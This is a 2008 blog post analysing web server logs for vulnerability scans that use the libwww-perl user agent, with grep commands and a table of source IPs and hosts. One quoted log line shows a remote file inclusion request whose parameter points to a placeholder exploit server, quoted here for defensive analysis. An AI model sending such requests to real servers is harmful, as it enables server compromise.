Exploit and Vulnerability Scanners using libwww-perl

Posted 2008-08-21 in Spam by Johann.

One of the stranger things I see are the people scanning for vulnerable servers that always use the same libwww-perl user agent, like in this example:

… "GET /inc/irayofuncs.php?irayodirhack=http://<sploit server>/id??%0D?? HTTP/1.1" 403 4232 "-" "libwww-perl/5.805" "-"

These people definitely come around:

$ grep -c '"libwww-perl' <this week’s log>
111

And with the exception of the following outfit, all of the libwww-perl is used only for vulnerability scanning and exploiting of servers.

$ grep '"libwww-perl' <log> | grep -v http
96.244.75.34 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"
70.88.158.109 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"

Obviously, the first thing you should do is white listing user agents so that none of the libwww-perl dirt can slip through and your server is hacked.

Statistics

The next thing is to take a look at where this scanning is coming from. I am using the last half year of my log files here.

Requests

IP address/Hostname

Hosting

Description

113

216.118.81.182
(216.118.81.0/24)

Site5 hosting, Net Access Corporation, US

63

65.91.249.193
(65.88.0.0/14)

Level3, US

46

217.20.118.202
deltaesports.com
(217.20.112.0/20)

netdirekt e. K., DE

41

217.20.116.93
atlas.f2k-server.org
(217.20.112.0/20)

netdirekt e. K., DE

40

195.205.178.120
bip.erg-bierun.com.pl
(195.205.0.0/16)

Zaklady Tworzyw Sztucznych Erg-Bierun S.A., PL

Black listed on these mail blocklists.

35

80.253.99.164
reds.freshwebhosts.com
(80.253.96.0/19)

Commerical Collocation Ltd, UK

Black listed as well.

31

213.228.155.43
smol-srv01.netvisao.pt
(213.228.128.0/18)

Cabovisao SA, PT

29

38.117.65.239
(38.0.0.0/8)

Ravand CyberTech Inc, Performance Systems International Inc., US

27

87.230.77.168
johannes.jarolim.com
(87.230.0.0/17)

Hosteurope GmbH, DE

27

216.239.69.227
onnet1.onnet.ca
(216.239.64.0/19)

VIF Internet, CA

As you can see, the IP addresses are all over the place, geographically and what they’re used for. Also, for half a year, 113 requests isn’t much so each system either runs at a stealthy low scanning rate (unlikely) or the scanner processes are discovered sooner or later and the security holes are plugged (more likely).

I haven’t had one of my servers hacked but one thing I would like to find out if these computers are exploited beyond the vulnerability scanning.

Subscribe

RSS 2.0, Atom or subscribe by Email.

Top Posts

  1. DynaCloud - a dynamic JavaScript tag/keyword cloud with jQuery
  2. 6 fast jQuery Tips: More basic Snippets
  3. xslt.js version 3.2 released
  4. xslt.js version 3.0 released XML XSLT now with jQuery plugin
  5. Forum Scanners - prevent forum abuse
  6. Automate JavaScript compression with YUI Compressor and /packer/

Categories

Navigation